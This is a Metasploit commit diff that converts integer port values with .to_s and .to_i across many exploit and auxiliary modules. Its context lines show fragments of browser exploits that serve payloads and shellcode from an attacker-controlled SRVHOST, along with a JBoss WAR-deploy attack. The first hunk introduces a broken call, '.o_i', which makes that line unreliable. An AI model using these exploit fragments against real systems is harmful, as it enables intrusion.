Take into account an integer-normalized datastore
parent
f7ecc98923
commit
e31a09203d
|
@ -66,8 +66,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def run
|
||||
|
||||
serverIP = datastore['RHOST']
|
||||
if (datastore['RPORT'] != 80)
|
||||
serverIP += ":" + datastore['RPORT']
|
||||
if (datastore['RPORT'].o_i != 80)
|
||||
serverIP += ":" + datastore['RPORT'].to_s
|
||||
end
|
||||
isapiURI = datastore['ISAPI']
|
||||
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
|
@ -167,7 +166,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
@evilchars = ['']
|
||||
end
|
||||
|
||||
print_status("Connecting to host " + ip + " on port " + datastore['RPORT'])
|
||||
print_status("Connecting to host " + ip + " on port " + datastore['RPORT'].to_s)
|
||||
|
||||
if (startstage == 1)
|
||||
process_phase(1, "Fuzzing without command")
|
||||
|
|
|
@ -97,14 +97,14 @@ class Metasploit3 < Msf::Auxiliary
|
|||
'Accept-Charset' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7',
|
||||
'Keep-Alive' => '300',
|
||||
'Connection' => 'keep-alive',
|
||||
'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'],
|
||||
'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
|
||||
'Content-Type' => 'application/x-www-form-urlencoded',
|
||||
}
|
||||
}
|
||||
@get_data_headers = {
|
||||
'Host' => host,
|
||||
'User-Agent' => useragent,
|
||||
'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'],
|
||||
'Referer' => proto + datastore['RHOST'] + ":" + datastore['RPORT'].to_s,
|
||||
}
|
||||
end
|
||||
|
||||
|
|
|
@ -47,7 +47,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if datastore['RPORT'].to_i == 80 or datastore['RPORT'].to_i == 443
|
||||
port = ""
|
||||
else
|
||||
port = ":" + datastore['RPORT']
|
||||
port = ":" + datastore['RPORT'].to_s
|
||||
end
|
||||
|
||||
info = (datastore['SSL'] ? "https" : "http") + "://#{target_host}#{port}/"
|
||||
|
|
|
@ -193,7 +193,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# UPLOAD
|
||||
#
|
||||
resource_uri = '/' + app_base + '.war'
|
||||
service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'] + resource_uri
|
||||
service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
|
||||
print_status("Starting up our web service on #{service_url} ...")
|
||||
start_service({'Uri' => {
|
||||
'Proc' => Proc.new { |cli, req|
|
||||
|
@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
}})
|
||||
|
||||
if (datastore['WARHOST'])
|
||||
service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'] + resource_uri
|
||||
service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
|
||||
end
|
||||
|
||||
print_status("Asking the JBoss server to deploy (via MainDeployer) #{service_url}")
|
||||
|
|
|
@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
begin
|
||||
socket = Rex::Socket.create_udp
|
||||
|
||||
upnp_location = "http://" + datastore['LHOST'] + ":" + datastore['SRVPORT']
|
||||
upnp_location = "http://" + datastore['LHOST'] + ":" + datastore['SRVPORT'].to_s
|
||||
|
||||
print_status("Listening for UPNP requests on: #{upnp_location}")
|
||||
print_status("Sending UPNP Discovery replies...")
|
||||
|
|
|
@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
payload_url = "http://"
|
||||
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/PAYLOAD"
|
||||
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
|
||||
|
||||
if (request.uri.match(/PAYLOAD/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
|
|
@ -103,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
shellcode = Rex::Text.to_unescape(p.encoded)
|
||||
url = ((datastore['SSL']) ? "https://" : "http://")
|
||||
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
|
||||
url << ":" + datastore['SRVPORT']
|
||||
url << ":" + datastore['SRVPORT'].to_s
|
||||
url << get_resource
|
||||
js = <<-ENDJS
|
||||
#{js_heap_spray}
|
||||
|
|
|
@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
shellcode = Rex::Text.to_unescape(p.encoded)
|
||||
url = ((datastore['SSL']) ? "https://" : "http://")
|
||||
url << ((datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(client.peerhost) : datastore['SRVHOST'])
|
||||
url << ":" + datastore['SRVPORT']
|
||||
url << ":" + datastore['SRVPORT'].to_s
|
||||
url << get_resource
|
||||
|
||||
fname = rand_text_alphanumeric(4)
|
||||
|
|
|
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
payload_url = "http://"
|
||||
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
|
||||
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
|
||||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
|
|
@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
url = "http://"
|
||||
url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
url += ":" + datastore['SRVPORT'] + get_resource() + "/"
|
||||
url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
|
||||
|
||||
#VBScript variables
|
||||
clsid = "79956462-F148-497F-B247-DF35A095F80B"
|
||||
|
|
|
@ -75,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
payload_url = "http://"
|
||||
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/#{@payload_rand}"
|
||||
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/#{@payload_rand}"
|
||||
|
||||
if (request.uri.match(/#{@payload_rand}/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
|
|
@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
url_base = "http://"
|
||||
url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
url_base += ":" + datastore['SRVPORT'] + get_resource()
|
||||
url_base += ":" + datastore['SRVPORT'].to_s + get_resource()
|
||||
|
||||
payload_url = url_base + "/payload"
|
||||
|
||||
|
|
|
@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
payload_url = "http://"
|
||||
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
|
||||
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
|
||||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
|
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
payload_url = "http://"
|
||||
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
|
||||
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
|
||||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
|
|
@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
payload_url = "http://"
|
||||
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
|
||||
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
|
||||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
|
|
@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
url = "http://"
|
||||
url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
url += ":" + datastore['SRVPORT'] + get_resource() + "/"
|
||||
url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/"
|
||||
|
||||
content = <<-EOS
|
||||
<?xml-stylesheet type="text/xml" href="#fragment"?>
|
||||
|
|
|
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
payload_url = "http://"
|
||||
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/PAYLOAD"
|
||||
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/PAYLOAD"
|
||||
|
||||
if (request.uri.match(/PAYLOAD/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
|
|
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
payload_url = "http://"
|
||||
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
|
||||
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
|
||||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
|
|
@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
payload_url = "http://"
|
||||
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
|
||||
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
|
||||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
|
|
@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
payload_url = "http://"
|
||||
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
|
||||
payload_url += ":" + datastore['SRVPORT'] + get_resource() + "/payload"
|
||||
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
|
||||
|
||||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
|
Loading…
Reference in New Issue